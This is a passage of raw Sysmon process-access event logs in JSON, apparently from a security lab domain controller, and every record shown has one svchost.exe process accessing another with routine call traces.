06:48:59.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":963,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":964,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":965,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":966,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":967,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":968,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":969,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":970,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 